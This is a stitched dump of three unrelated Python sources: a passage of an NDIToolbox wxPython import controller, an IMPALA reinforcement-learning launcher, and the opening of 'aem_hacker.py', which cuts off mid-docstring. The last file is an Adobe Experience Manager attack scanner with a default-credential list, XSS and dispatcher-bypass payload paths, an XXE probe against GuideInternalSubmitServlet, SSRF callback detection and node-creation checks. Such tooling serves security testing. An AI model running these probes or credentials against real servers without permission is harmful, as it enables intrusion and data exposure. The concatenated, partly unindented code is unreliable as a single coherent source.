        """Handles request to add HDF5 file to data folder"""
        hdf5_file = self.choose_import_file(wildcard = "NDIToolbox Files (*.hdf5)|*.hdf5")
        if hdf5_file is not None:
            self.import_hdf5(hdf5_file)
def import_text(self, file_name):
"""Converts and imports the specified ASCII-delimited data file"""
try:
import_dlg = dlg.ImportTextDialog(parent=self.view.parent)
if import_dlg.ShowModal() == wx.ID_OK:
read_parameters = import_dlg.get_import_parameters()
self.import_data(dataio.import_txt, args=(file_name,), kwargs=read_parameters)
self.view.data_panel.populate()
finally:
import_dlg.Destroy()
    def on_import_text(self, evt):
        """Handles request to add ASCII data to data folder"""
        txt_wildcards = ["TXT (*.txt)|*.txt", "CSV (*.csv)|*.csv",
                         "DAT (*.dat)|*.dat", "TAB (*.tab)|*.tab",
                         "All Files (*.*)|*.*"]
        text_file = self.choose_import_file(wildcard="|".join(txt_wildcards))
        if text_file is not None:
            self.import_text(text_file)
    def on_export_text(self, evt):
        """Handles request to export selected data to delimited ASCII"""
        file_dlg = wx.FileDialog(parent=self.view, message="Please specify an output filename.",
                                 style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
        if file_dlg.ShowModal() == wx.ID_OK:
            exportfmt_dlg = dlg.ExportTextDialog(parent=self.view.parent)
            if exportfmt_dlg.ShowModal() == wx.ID_OK:
                wx.BeginBusyCursor()
                export_params = exportfmt_dlg.get_export_parameters()
                exception_queue = Queue.Queue()
                # Run the export in a worker thread so the UI stays responsive.
                export_text_thd = workerthread.WorkerThread(exception_queue=exception_queue,
                                                            target=dataio.export_txt,
                                                            args=(file_dlg.GetPath(), self.view.data_panel.data),
                                                            kwargs=export_params)
                export_text_thd.start()
                while True:
                    export_text_thd.join(0.125)
                    if not export_text_thd.is_alive():
                        try:
                            exc_type, exc = exception_queue.get(block=False)
                            err_str = str(exc)
                            if len(err_str) == 0:
                                err_str = exc_type.__name__
                            module_logger.error("Error exporting to text file: {0}".format(err_str))
                            err_msg = "An error occurred during export:\n{0}".format(err_str)
                            err_dlg = wx.MessageDialog(self.view, message=err_msg,
                                                       caption="Unable To Export File", style=wx.ICON_ERROR)
                            err_dlg.ShowModal()
                        except Queue.Empty:
                            # No exception recorded - the export succeeded.
                            pass
                        break
                    wx.GetApp().Yield()
                wx.EndBusyCursor()
            exportfmt_dlg.Destroy()
    def on_slice_data(self, evt):
        """Handles request to export a slice of data"""
        slice_dlg = dlg.ExportSliceDialog(parent=self.view, datafile=self.view.data_panel.data)
        if slice_dlg.ShowModal() == wx.ID_OK:
            try:
                wx.BeginBusyCursor()
                sliced_data = dataio.get_data(self.view.data_panel.data, slice_dlg.get_slice())
                # Suggest "sliced_<original name>" as the output filename.
                sliced_data_fname = "_".join(["sliced",
                                              os.path.basename(self.view.data_panel.data)])
                fname_dlg = wx.TextEntryDialog(parent=self.view, message="Please specify a filename for the sliced data.",
                                               caption="Save Sliced Data", defaultValue=sliced_data_fname)
                if fname_dlg.ShowModal() == wx.ID_OK:
                    dest_fname = os.path.join(pathfinder.data_path(), fname_dlg.GetValue())
                    dataio.save_data(dest_fname, sliced_data)
                    self.view.data_panel.populate()
            except TypeError: # bad dimensions
                err_dlg = wx.MessageDialog(self.view, message="Specified dimensions out of range for this data.",
                                           caption="Unable To Slice Data", style=wx.ICON_ERROR)
                err_dlg.ShowModal()
                err_dlg.Destroy()
            except ValueError: # zero-length slices, etc.
                err_dlg = wx.MessageDialog(self.view, message="Zero-length slices are not permitted.",
                                           caption="Unable To Slice Data", style=wx.ICON_ERROR)
                err_dlg.ShowModal()
                err_dlg.Destroy()
            finally:
                wx.EndBusyCursor()
        slice_dlg.Destroy()
    def import_dicom(self, file_name):
        """Converts and imports the specified DICOM/DICONDE data file"""
        self.import_data(dataio.import_dicom, args=(file_name,))
        self.view.data_panel.populate()
    def on_import_dicom(self, evt):
        """Handles request to add DICOM/DICONDE data to data folder"""
        wildcards = "DICOM files (*.dcm)|*.dcm|All Files (*.*)|*.*"
        dicom_file = self.choose_import_file(wildcards)
        if dicom_file is not None:
            self.import_dicom(dicom_file)
    def import_image(self, file_name):
        """Converts and imports the specified bitmap image. Requires PIL.
        """
        # Check for PIL
        try:
            from PIL import Image
            module_logger.info("from PIL import Image successful.")
        except ImportError:
            module_logger.error("from PIL import Image failed, trying second format.")
            try:
                # Older PIL installs expose a top-level Image module instead.
                import Image
                module_logger.info("import Image successful.")
            except ImportError: # PIL not installed
                module_logger.error("import Image failed to import PIL.")
                err_dlg = wx.MessageDialog(self.view,
                                           message="Please install the Python Imaging Library (PIL).",
                                           caption="PIL Module Required", style=wx.ICON_ERROR)
                err_dlg.ShowModal()
                err_dlg.Destroy()
                return
        # Ask whether to flatten the palette to grayscale before import.
        flatten_img = True
        msg = "The image data should be converted to grayscale for data analysis. Proceed?"
        flatten_dlg = wx.MessageDialog(parent=self.view.parent,
                                       message=msg,
                                       caption="Flatten Palette?",
                                       style=wx.YES_NO | wx.YES_DEFAULT)
        if flatten_dlg.ShowModal() == wx.ID_NO:
            flatten_img = False
        self.import_data(dataio.import_img, args=(file_name, flatten_img))
        self.view.data_panel.populate()
    def on_import_image(self, evt):
        """Handles request to add image data to data folder"""
        img_wildcards = ["All Files (*.*)|*.*", "BMP (*.bmp)|*.bmp", "DCX (*.dcx)|*.dcx",
                         "EPS (*.eps)|*.eps", "GIF (*.gif)|*.gif", "IM (*.im)|*.im",
                         "IMT (*.imt)|*.imt", "JPEG (*.jpg,*.jpeg)|*.jpg;*.jpeg",
                         "PCX (*.pcx)|*.pcx", "PNG (*.png)|*.png", "PPM (*.ppm)|*.ppm",
                         "PSD (*.psd)|*.psd", "SGI (*.sgi)|*.sgi", "TGA (*.tga)|*.tga",
                         "TIFF (*.tiff)|*.tiff", "XPM (*.xpm)|*.xpm"]
        img_file = self.choose_import_file(wildcard="|".join(img_wildcards))
        if img_file is not None:
            self.import_image(img_file)
    def import_csc(self, file_name):
        """Converts and imports a UTWin Cscan data file"""
        self.import_data(dataio.import_utwin, args=(file_name,))
        self.view.data_panel.populate()
    def on_import_csc(self, evt):
        """Handles request to add UTWin Cscan data to data folder"""
        wildcards = "UTWin CScans (*.csc)|*.csc|All Files (*.*)|*.*"
        csc_file = self.choose_import_file(wildcards)
        if csc_file is not None:
            self.import_csc(csc_file)
    def import_sdt(self, file_name):
        """Converts and imports a Winspect 6/7 data file"""
        self.import_data(dataio.import_winspect, args=(file_name,))
        self.view.data_panel.populate()
    def on_import_sdt(self, evt):
        """Handles request to add Winspect data to data folder"""
        wildcards = "Winspect 6/7 CScans (*.sdt)|*.sdt|All Files (*.*)|*.*"
        sdt_file = self.choose_import_file(wildcards)
        if sdt_file is not None:
            self.import_sdt(sdt_file)
    def on_data_info(self, evt):
        """Handles request to display info about selected data"""
        self.show_data_info()
    def show_data_info(self):
        """Displays info about selected data"""
        if self.view.data_panel.data is not None:
            try:
                wx.BeginBusyCursor()
                data_info = self.model.get_data_info(self.view.data_panel.data)
                if data_info is not None:
                    data_msg = "File Size: {0} bytes\n\nData Dimensions: {1}\nData Shape: {2}\nNumber of Points: {3} ({4} data type)".format(
                        data_info['filesize'], data_info['ndim'], data_info['shape'], data_info['numpoints'], data_info['dtype']
                    )
                else:
                    data_msg = "Unable to read {0}".format(self.view.data_panel.data)
                info_dlg = wx.MessageDialog(parent=self.view, message=data_msg,
                                            caption=os.path.basename(self.view.data_panel.data), style=wx.OK)
                info_dlg.ShowModal()
                info_dlg.Destroy()
            except MemoryError:
                # Very large datasets can exhaust memory during the query.
                err_dlg = wx.MessageDialog(self.view,
                                           message="Insufficient memory to load data.",
                                           caption="Unable To Query Data File", style=wx.ICON_ERROR)
                err_dlg.ShowModal()
                err_dlg.Destroy()
            finally:
                wx.EndBusyCursor()
    def on_remove_data(self, evt):
        """Handles request to remove data from data folder"""
        if self.view.data_panel.data is not None:
            confirm_deletion_dlg = wx.MessageDialog(parent=self.view.parent,
                                                    caption="Delete File?",
                                                    message="Are you sure you want to delete this"\
                                                            " file?",
                                                    style=wx.OK | wx.CANCEL)
            if confirm_deletion_dlg.ShowModal() == wx.ID_OK:
                self.model.remove_data(self.view.data_panel.data)
                self.view.data_panel.populate()
    def on_preview_data(self, evt):
        """Handles request to preview data"""
        if self.view.data_panel.data is not None:
            try:
                wx.BeginBusyCursor()
                data_window = preview_window.PreviewWindow(parent=self.view,
                                                           data_file=self.view.data_panel.data)
                # Only show the window if the file actually yielded data.
                if data_window.has_data():
                    data_window.Show()
            finally:
                wx.EndBusyCursor()
def on_plot_data(self, evt):
"""Handles request to generate X-Y plot of selected data"""
if self.view.data_panel.data is not None:
wx.BeginBusyCursor()
plt_window = plotwindow.PlotWindow(self.view, data_file=self.view.data_panel.data)
if plt_window.has_data():
plt_window.Show()
wx.EndBusyCursor()
    def on_imageplot_data(self, evt):
        """Handles request to generate image plot of selected data"""
        if self.view.data_panel.data is not None:
            wx.BeginBusyCursor()
            try:
                plt_window = plotwindow.ImgPlotWindow(parent=self.view,
                                                      data_file=self.view.data_panel.data)
                if plt_window.has_data():
                    plt_window.Show()
            except Exception: # Error occurred
                # NOTE(review): the failure is silently swallowed - no dialog,
                # no log entry. Confirm this is intentional.
                return
            finally:
                wx.EndBusyCursor()
    def on_megaplot_data(self, evt):
        """Handles request to generate megaplot of selected data"""
        if self.view.data_panel.data is not None:
            wx.BeginBusyCursor()
            try:
                plt_window = plotwindow.MegaPlotWindow(parent=self.view, data_file=self.view.data_panel.data)
                if plt_window.has_data():
                    plt_window.Show()
            except IndexError: # data not 3D
                module_logger.error("User attempted to use MegaPlot on data that is not three-dimensional.")
                err_dlg = wx.MessageDialog(self.view,
                                           message="Data must have three dimensions.",
                                           caption="Unable To Plot Data", style=wx.ICON_ERROR)
                err_dlg.ShowModal()
                err_dlg.Destroy()
            finally:
                wx.EndBusyCursor()
    def on_run_podtk(self, evt):
        """Handles request to run POD Toolkit"""
        podtk_ui = podtk.PODWindow(parent=self.view)
        podtk_ui.Show()
    def on_run_adatk(self, evt):
        """Handles request to run ADA Toolkit"""
        adatk_ui = adatk.ADAWindow(parent=self.view)
        adatk_ui.Show()
    def on_run_DSF_podtk(self, evt):
        """Handles request to run TRI/Austin POD Toolkit"""
        podtk_ui = DSF_podtk.DSF_PODWindow(parent=self.view)
        podtk_ui.Show()
|
main.py | import copy
from multiprocessing.managers import BaseManager
import gym
import numpy as np
import torch.multiprocessing as mp
from impala.actor import actor
from impala.learner import learner
from impala.model import Network
from impala.parameter_server import ParameterServer
NUM_ACTORS = 4
ACTOR_TIMEOUT = 500000
if __name__ == "__main__":
    env = gym.make('CartPole-v1')
    env.seed(42)
    nS = np.shape(env.observation_space)[0]  # observation dimensionality
    nA = env.action_space.n                  # number of discrete actions
    queue = mp.Queue()
    learner_model = Network(nS, nA, "cpu")
    actor_model = Network(nS, nA, "cpu")
    # Expose ParameterServer through a manager proxy so all processes share it.
    BaseManager.register('ParameterServer', ParameterServer)
    manager = BaseManager()
    manager.start()
    parameter_server = manager.ParameterServer()
    # Renamed from `learner`/`actor`: the original names shadowed the imported
    # target functions of the same names, inviting subtle breakage.
    learner_proc = mp.Process(target=learner, args=(learner_model, queue, parameter_server))
    # Currently each actor has its own object via deepcopy. What happens if I don't explicitly do deepcopy?
    actor_procs = [mp.Process(target=actor, args=(copy.deepcopy(actor_model), queue, copy.deepcopy(env), parameter_server))
                   for _ in range(NUM_ACTORS)]
    for proc in actor_procs:
        proc.start()
    learner_proc.start()
    for proc in actor_procs:
        proc.join()
    learner_proc.join()
|
aem_hacker.py | import concurrent.futures
import itertools
import json
import datetime
import traceback
import sys
import argparse
import base64
import time
from collections import namedtuple
from http.server import BaseHTTPRequestHandler, HTTPServer
from random import choice, randint
from string import ascii_letters
from threading import Thread
import requests
requests.packages.urllib3.disable_warnings()
# Known default/demo credential pairs ('user:password'), including stock
# AEM/Geometrixx demo accounts; presumably tried by the credential checks --
# usage is outside this chunk, confirm against the registered checks.
CREDS = ('admin:admin',
         'author:author',
         'grios:password',
         'replication-receiver:replication-receiver',
         'vgnadmin:vgnadmin',
         'aparker@geometrixx.info:aparker',
         'jdoe@geometrixx.info:jdoe',
         'james.devore@spambob.com:password',
         'matt.monroe@mailinator.com:password',
         'aaron.mcdonald@mailinator.com:password',
         'jason.werner@dodgit.com:password')
def random_string(length=10):
    """Return a random string of ASCII letters of the given *length*."""
    return ''.join(choice(ascii_letters) for _ in range(length))
registered = {} # Registered checks (name -> check function, filled by @register)
token = random_string() # Token to recognize SSRF was triggered
d = {} # store SSRF detections (key -> list of reported values)
extra_headers = {} # extra HTTP headers merged into every outgoing request
class Detector(BaseHTTPRequestHandler):
    """Callback HTTP handler that records SSRF hits.

    Expects request paths of the form /<token>/<key>/<value>; when <token>
    matches, appends <value> to the shared dict *d* under <key>. Always
    responds 200 so probes reveal nothing.
    """
    def __init__(self, token, d, *args):
        # Extra leading parameters: instances are presumably created via a
        # partial that pre-binds token and d ahead of the normal
        # BaseHTTPRequestHandler arguments -- confirm at the server setup site.
        self.d = d
        self.token = token
        BaseHTTPRequestHandler.__init__(self, *args)
    def log_message(self, format, *args):
        # Silence the default per-request stderr logging.
        return
    def do_GET(self):
        self.serve()
    def do_POST(self):
        self.serve()
    def do_PUT(self):
        self.serve()
    def serve(self):
        # Parse /<token>/<key>/<value>; malformed paths are acknowledged
        # without recording anything.
        try:
            token, key, value = self.path.split('/')[1:4]
        except:
            self.send_response(200)
            return
        if self.token != token:
            self.send_response(200)
            return
        if key in self.d:
            self.d[key].append(value)
        else:
            self.d[key] = [value, ]
        self.send_response(200)
def register(name):
    """Decorator factory: file the wrapped check function in the module-level
    ``registered`` mapping under *name*, returning the function unchanged."""
    def _record(check):
        registered[name] = check
        return check
    return _record
# One scan result: short check name, the offending URL, human-readable advice.
Finding = namedtuple('Finding', 'name, url, description')
def normalize_url(base_url, path):
    """Concatenate *base_url* and *path*, dropping base_url's trailing slash
    when *path* itself starts with '/' or '\\' (payloads often do)."""
    doubled_separator = base_url[-1] == '/' and path[0] in ('/', '\\')
    if doubled_separator:
        return base_url[:-1] + path
    return base_url + path
def content_type(ct):
    """Return the bare, lowercased media type from a Content-Type header
    value, ignoring parameters such as charset."""
    media_type, _, _ = ct.partition(';')
    return media_type.strip().lower()
def error(message, **kwargs):
    """Print a timestamped error report plus the current exception to stderr.

    message -- short description of what failed
    kwargs  -- arbitrary context values, printed one per line as name=value

    Bug fix: the original passed ``sys.stderr`` as a positional *value*
    argument to print(), so all output actually went to stdout with the
    stderr object's repr appended; it must be the ``file=`` keyword.
    """
    print('[{}] {}'.format(datetime.datetime.now().time(), message), file=sys.stderr)
    for n, a in kwargs.items():
        print('\t{}={}'.format(n, a), file=sys.stderr)
    # sys.exc_info() yields (None, None, None) outside an except block;
    # traceback.print_tb(None) then simply prints nothing.
    exc_type, exc_value, exc_traceback = sys.exc_info()
    print('Exception type:' + str(exc_type), file=sys.stderr)
    print('Exception value:' + str(exc_value), file=sys.stderr)
    print('TRACE:', file=sys.stderr)
    traceback.print_tb(exc_traceback, file=sys.stderr)
    print('\n\n\n', file=sys.stderr)
def http_request(url, method='GET', data=None, additional_headers=None, proxy=None, debug=False):
    """Issue one HTTP request with the scanner's defaults.

    Defaults: curl-like User-Agent, TLS verification off, 40s timeout,
    redirects NOT followed (status codes are part of the detection logic).
    Returns the requests.Response.
    """
    headers = {'User-Agent': 'curl/7.30.0'}
    if additional_headers:
        headers.update(additional_headers)
    if extra_headers:
        headers.update({
            # Merge the globally configured extra headers, but never
            # override a header this specific request already controls.
            h_name: h_value
            for h_name, h_value in extra_headers.items()
            if h_name not in headers
        })
    if not proxy:
        proxy = {}
    if debug:
        print('>> Sending {} {}'.format(method, url))
    resp = requests.request(method, url, data=data, headers=headers, proxies=proxy,
                            verify=False, timeout=40, allow_redirects=False)
    if debug:
        # Bug fix: original printed the literal '{}' placeholder -- the
        # status code was never formatted into the message.
        print('<< Received HTTP-{}'.format(resp.status_code))
    return resp
def http_request_multipart(url, method='POST', data=None, additional_headers=None, proxy=None, debug=False):
    """Like http_request(), but sends *data* as multipart/form-data
    (requests' ``files=`` parameter) -- used for package/file uploads."""
    headers = {'User-Agent': 'curl/7.30.0'}
    if additional_headers:
        headers.update(additional_headers)
    if extra_headers:
        headers.update({
            # Merge the globally configured extra headers, but never
            # override a header this specific request already controls.
            h_name: h_value
            for h_name, h_value in extra_headers.items()
            if h_name not in headers
        })
    if not proxy:
        proxy = {}
    if debug:
        print('>> Sending {} {}'.format(method, url))
    resp = requests.request(method, url, files=data, headers=headers, proxies=proxy,
                            verify=False, timeout=40, allow_redirects=False)
    if debug:
        # Bug fix: original printed the literal '{}' placeholder -- the
        # status code was never formatted into the message.
        print('<< Received HTTP-{}'.format(resp.status_code))
    return resp
def preflight(url, proxy=None, debug=False):
    """Return True when *url* answers at all, False on any request failure.

    Fix: narrowed the bare ``except:`` to ``except Exception`` so that
    KeyboardInterrupt/SystemExit still abort the scan instead of being
    silently reported as "target unreachable".
    """
    try:
        http_request(url, proxy=proxy, debug=debug)
    except Exception:
        return False
    else:
        return True
@register('set_preferences')
def exposed_set_preferences(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed setPreferences.jsp (reflected XSS via ``keymap``).

    my_host is unused here; every check shares the same signature so the
    dispatcher can invoke them uniformly.  Returns a list of Finding tuples.
    """
    r = random_string(3)
    # Path variants x dispatcher-confusion suffixes; the exact payload
    # strings are the attack vectors -- keep them verbatim.
    SETPREFERENCES = itertools.product(('/crx/de/setPreferences.jsp', '///crx///de///setPreferences.jsp'),
                                       (';%0a{0}.html', '/{0}.html'),
                                       ('?keymap=<1337>&language=0',))
    SETPREFERENCES = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in SETPREFERENCES)
    results = []
    for path in SETPREFERENCES:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy)
            # The servlet answers 400 but reflects the unescaped keymap value.
            if resp.status_code == 400:
                if '<1337>' in resp.content.decode():
                    f = Finding('SetPreferences', url,
                                'Page setPreferences.jsp is exposed, XSS might be possible via keymap parameter.')
                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_set_preferences', url=url)
    return results
@register('merge_metadata')
def exposed_merge_metadata(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed MergeMetadataServlet (XSS via the ``path`` parameter).

    Returns a list of Finding tuples; stops at the first working variant.
    """
    r = random_string(3)
    MERGEMETADATA = itertools.product(('/libs/dam/merge/metadata', '///libs///dam///merge///metadata'),
                                      ('.html', '.css/{0}.html', '.ico/{0}.html', '....4.2.1....json/{0}.html',
                                       '.css;%0a{0}.html', '.ico;%0a{0}.html'),
                                      ('?path=/etc&.ico',))
    MERGEMETADATA = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in MERGEMETADATA)
    results = []
    for path in MERGEMETADATA:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy)
            if resp.status_code == 200:
                # EAFP probe: only a valid JSON body carrying 'assetPaths'
                # identifies the servlet; everything else lands in 'pass'.
                try:
                    json.loads(resp.content.decode())['assetPaths']
                except:
                    pass
                else:
                    f = Finding('MergeMetadataServlet', url,
                                'MergeMetadataServlet is exposed, XSS might be possible via path parameter.')
                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_merge_metadata', url=url)
    return results
@register('get_servlet')
def exposed_get_servlet(base_url, my_host, debug=False, proxy=None):
    """Probe AEM's DefaultGetServlet for JCR node dumps under common roots.

    Unlike most checks this does NOT break on the first hit: every leaking
    root path is reported separately.
    """
    r = random_string(3)
    GETSERVLET = itertools.product(('/', '/etc', '/var', '/apps', '/home', '///etc', '///var', '///apps', '///home'),
                                   ('', '.children'),
                                   ('.json', '.1.json', '....4.2.1....json', '.json?{0}.css', '.json?{0}.ico', '.json?{0}.html',
                                    '.json/{0}.css', '.json/{0}.html', '.json/{0}.png', '.json/{0}.ico',
                                    '.json;%0a{0}.css', '.json;%0a{0}.png', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
    GETSERVLET = list('{0}{1}{2}'.format(p1, p2, p3.format(r)) for p1, p2, p3 in GETSERVLET)
    results = []
    for path in GETSERVLET:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy)
            if resp.status_code == 200:
                try:
                    json.loads(resp.content.decode())
                    # A real node dump always contains jcr:primaryType;
                    # raising routes non-dump JSON into the 'pass' branch.
                    if not 'jcr:primaryType' in resp.content.decode():
                        raise Exception()
                except:
                    pass
                else:
                    f = Finding('DefaultGetServlet', url,
                                'Sensitive information might be exposed via AEM\'s DefaultGetServlet. '
                                'Check child nodes manually for secrets exposed, see - '
                                'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43')
                    results.append(f)
        except:
            if debug:
                error('Exception while performing a check', check='exposed_get_servlet', url=url)
    return results
@register('querybuilder_servlet')
def exposed_querybuilder_servlet(base_url, my_host, debug=False, proxy=None):
    """Probe the QueryBuilder JSON and feed servlets.

    The same payload list covers both endpoints; two flags ensure each
    servlet flavour is reported at most once, and the loop stops early
    once both have been found.
    """
    r = random_string(3)
    QUERYBUILDER = itertools.product(('/bin/querybuilder.json', '///bin///querybuilder.json', '/bin/querybuilder.feed', '///bin///querybuilder.feed'),
                                     ('', '.css', '.ico', '.png', '.gif', '.html', '.1.json', '....4.2.1....json',
                                      ';%0a{0}.css', ';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', '.ico;%0a{0}.ico',
                                      '.css;%0a{0}.css', '.html;%0a{0}.html', '?{0}.css', '?{0}.ico'))
    QUERYBUILDER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in QUERYBUILDER)
    results = []
    found_json = False  # JSON servlet already reported
    found_feed = False  # feed servlet already reported
    for path in QUERYBUILDER:
        if found_feed and found_json:
            break
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy)
            if resp.status_code == 200:
                # JSON flavour: body must parse and expose a 'hits' key.
                try:
                    json.loads(resp.content.decode())['hits']
                except:
                    pass
                else:
                    if found_json:
                        continue
                    f = Finding('QueryBuilderJsonServlet', url,
                                'Sensitive information might be exposed via AEM\'s QueryBuilderJsonServlet. '
                                'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
                    results.append(f)
                    found_json = True
                # Feed flavour: identified by the closing Atom tag.
                if '</feed>' in str(resp.content):
                    if found_feed:
                        continue
                    f = Finding('QueryBuilderFeedServlet', url,
                                'Sensitive information might be exposed via AEM\'s QueryBuilderFeedServlet. '
                                'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
                    results.append(f)
                    found_feed = True
        except:
            if debug:
                error('Exception while performing a check', check='exposed_querybuilder_servlet', url=url)
    return results
@register('gql_servlet')
def exposed_gql_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed GQLServlet (full-text JCR query endpoint).

    The probe query asks for User nodes; a 200 response whose JSON body
    contains a 'hits' key confirms the servlet answers queries.
    """
    r = random_string(3)
    GQLSERVLET = itertools.product(('/bin/wcm/search/gql', '///bin///wcm///search///gql'),
                                   ('.json', '....1....json', '.json/{0}.css', '.json/{0}.html', '.json/{0}.ico', '.json/{0}.png',
                                    '.json;%0a{0}.css', '.json;%0a{0}.ico', '.json;%0a{0}.html', '.json;%0a{0}.png'),
                                   ('?query=type:User%20limit:..1&pathPrefix=&p.ico',))
    GQLSERVLET = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in GQLSERVLET)
    results = []
    for path in GQLSERVLET:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy)
            if resp.status_code == 200:
                try:
                    json.loads(resp.content.decode())['hits']
                except:
                    pass
                else:
                    f = Finding('GQLServlet', url,
                                'Sensitive information might be exposed via AEM\'s GQLServlet. '
                                'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html')
                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_gql_servlet', url=url)
    return results
@register('guide_internal_submit_servlet')
def exposed_guide_internal_submit_servlet_xxe(base_url, my_host, debug=False, proxy=None):
    """Detect GuideInternalSubmitServlet exposure (AEM Forms XXE).

    POSTs a guideState whose guidePrefillXml embeds <afData>ABC</afData>
    (the \\u0041\\u0042\\u0043 escapes are resolved by Python at source
    level); if the server parses the XML and reflects '<afData>ABC', it is
    processing attacker-controlled XML -> XXE is possible.
    """
    r = random_string(3)
    # Known guideContainer node paths from sample content, templates and
    # template-types (one surveyTemplate entry is duplicated in the
    # original list), crossed with internalsubmit selector variants.
    GuideInternalSubmitServlet = itertools.product(('/content/forms/af/geometrixx-gov/application-for-assistance/jcr:content/guideContainer',
                                                    '/content/forms/af/geometrixx-gov/geometrixx-survey-form/jcr:content/guideContainer',
                                                    '/content/forms/af/geometrixx-gov/hardship-determination/jcr:content/guideContainer',
                                                    '/libs/fd/af/components/guideContainer/cq:template',
                                                    '///libs///fd///af///components///guideContainer///cq:template',
                                                    '/libs/fd/af/templates/simpleEnrollmentTemplate2/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///simpleEnrollmentTemplate2///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/surveyTemplate2/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///surveyTemplate2///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/blankTemplate2/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///blankTemplate2///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
                                                    '/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///surveyTemplate///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/tabbedEnrollmentTemplate/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///tabbedEnrollmentTemplate///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/tabbedEnrollmentTemplate2/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///tabbedEnrollmentTemplate2///jcr:content///guideContainer',
                                                    '/libs/fd/af/templates/simpleEnrollmentTemplate/jcr:content/guideContainer',
                                                    '///libs///fd///af///templates///simpleEnrollmentTemplate///jcr:content///guideContainer',
                                                    '/libs/settings/wcm/template-types/afpage/initial/jcr:content/guideContainer',
                                                    '///libs///settings///wcm///template-types///afpage///initial///jcr:content///guideContainer',
                                                    '/libs/settings/wcm/template-types/afpage/structure/jcr:content/guideContainer',
                                                    '///libs///settings///wcm///template-types///afpage///structure///jcr:content///guideContainer',
                                                    '/apps/geometrixx-gov/templates/enrollment-template/jcr:content/guideContainer',
                                                    '/apps/geometrixx-gov/templates/survey-template/jcr:content/guideContainer',
                                                    '/apps/geometrixx-gov/templates/tabbed-enrollment-template/jcr:content/guideContainer'),
                                                   ('.af.internalsubmit.json', '.af.internalsubmit.1.json', '.af.internalsubmit...1...json',
                                                    '.af.internalsubmit.html', '.af.internalsubmit.js', '.af.internalsubmit.css',
                                                    '.af.internalsubmit.ico', '.af.internalsubmit.png', '.af.internalsubmit.gif',
                                                    '.af.internalsubmit.svg', '.af.internalsubmit.ico;%0a{0}.ico',
                                                    '.af.internalsubmit.html;%0a{0}.html', '.af.internalsubmit.css;%0a{0}.css'))
    GuideInternalSubmitServlet = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GuideInternalSubmitServlet)
    results = []
    for path in GuideInternalSubmitServlet:
        url = normalize_url(base_url, path)
        try:
            data = 'guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}'
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
            if resp.status_code == 200 and '<afData>ABC' in str(resp.content):
                f = Finding('GuideInternalSubmitServlet', url,
                            'GuideInternalSubmitServlet is exposed, XXE is possible.')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_guide_internal_submit_servlet_xxe', url=url)
    return results
@register('post_servlet')
def exposed_post_servlet(base_url, my_host, debug=False, proxy=None):
    """Detect an exposed Sling POST Servlet via the harmless ':operation=nop'.

    A 200 response echoing 'Null Operation Status:' proves anonymous POSTs
    reach the POST servlet (write access -> persistent XSS / RCE potential).
    """
    r = random_string(3)
    POSTSERVLET = itertools.product(('/', '/content', '/content/dam'),
                                    ('.json', '.1.json', '...4.2.1...json', '.json/{0}.css', '.json/{0}.html',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html'))
    POSTSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in POSTSERVLET)
    results = []
    for path in POSTSERVLET:
        url = normalize_url(base_url, path)
        try:
            data = ':operation=nop'
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
            if resp.status_code == 200 and 'Null Operation Status:' in str(resp.content):
                f = Finding('POSTServlet', url,
                            'POSTServlet is exposed, persistent XSS or RCE might be possible, it depends on your privileges.')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_post_servlet', url=url)
    return results
@register('create_new_nodes')
def create_new_nodes(base_url, my_host, debug=False, proxy=None):
    """Test whether new JCR nodes can be created via the Sling POST Servlet.

    Two passes: (1) anonymous node creation under user-generated content
    paths; (2) authenticated creation under /, /content/, /apps/, /libs/
    using default admin/author credentials.  A response page containing
